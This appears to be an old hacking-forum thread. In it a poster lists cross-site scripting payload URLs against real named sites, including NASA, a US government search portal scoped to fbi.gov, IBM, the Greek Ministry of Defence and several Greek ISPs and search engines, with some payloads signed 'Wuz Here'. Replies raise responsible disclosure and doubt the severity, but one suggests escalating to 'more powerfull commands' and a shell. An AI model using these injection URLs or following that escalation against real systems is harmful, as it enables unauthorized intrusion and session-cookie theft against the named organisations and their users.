-
Xss!!!!!!
Here there are some Vulnerable sites i found:
We start with NASA.GOV
http://search.nasa.gov/nasasearch/se...ubmitsearch.x=<script>alert("m")</script>&submitsearch.y=<script>alert("m")</script>
http://search.nasa.gov/nasasearch/br...gory+Search.x=<script>alert("m")</script>&Category+Search.y=<script>alert("m")</script>
And we go on with Fbi:
hmmm what is this?
http://www.firstgov.gov/fgsearch/ind...ubmit=+Search+
w0w! INTERNAL server error
http://www.firstgov.gov/fgsearch/index.jsp?dom=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov
http://www.firstgov.gov/fgsearch/index.jsp?dom0=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov
Ibm is also vulnerable:
http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>
www.opera.com
In the search engine write: <script>alert("m")</script>
http://www.business.com/search/rslt_...=&bdcf=&vt=all
http://www.searchengineworld.com/
--Write <script>alert("m")</script> in the e-mail address field
http://www.crackfound.com/engine.cgi...9%3C/script%3E
http://www.thebugs.ws/search.php?q=%...9%3C/script%3E
http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>
http://www.anubis.gr/Users/default.a...er&act=newUser
http://www.pcmaster.gr/forum/default.asp?Action=Search
Ministry of defence in Greece:
http://www.mod.mil.gr/contact/all_ma...html?seclevel=<script>alert("m")</script>
Hol (hellas on line ISP):
http://search.hol.gr/advanced.asp?advanced=<script>alert("insane")</script)&c2=<script>alert("insane")</script)&o2=<script>alert("Dr_insane%20Wuz%20Here")</script)&ct=<script>alert("Dr_insane%20Wuz%20Here")</script)&q1=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%29&searchlang=&q2=<script>alert("m")</script)&so=<script>alert("Dr_insane%20Wuz%20Here")</script)
http://search.hol.gr/search.asp?ct=G...o.x=14&Go.y=16
http://www.linuxfreaks.gr/
http://www.findlink.gr/searching.asp?key=<script>alert("m")</script>&logic=any
http://search.pathfinder.gr/search?q...ipt%3E&tab=web
http://www.anazitisis.gr/cgi-bin/hts....x=5&search.y=<script>alert("m")</script>
http://www.ditto.com/searchResults.a...t%3E&search.x=<script>alert("m")</script>&search.y=<script>alert("m")</script>
http://promosearch.atomz.com/search/...8112&submit.x=<script>alert("m")</script>&submit.y=<script>alert("m")</script>
http://www.askjeeves.com ****
http://www.mixer.gr/cgi-bin/mxmeta?q...3C%2Fscript%3E
http://www.robby.gr/search.rsp?searc...615407&parent=
EOF
/dr_insane
dr_insane at pathfinder.gr
-
why dont you contact some of their webmasters and tell them their vulnebarities .....
-
Really quick, what makes you classify those as vulnerabilities? Yes, the these servers may contain vulnerabilities, but none of the links you posted are exploitable vulnerabilities. You're just passing a specific command into the search fields to give an internal server error. Doesn't appear to be anything special to me...
AJ
-
-
well it depends of what you write in your script...
you can also try in some asp/php forums or search engines to add more powerfull commands and even get yourself a shell in some method...
-
Do these urls require authenticated sessions to get to them? Is there anything of value protected by these sessions? Otherwise, I don't see much point in stealing cookies (which is pretty much all you can do with javascript xss) from search pages...
Of course if the site was parsing asp or php or someother server side scripting this might be bad indeed...
Ammo
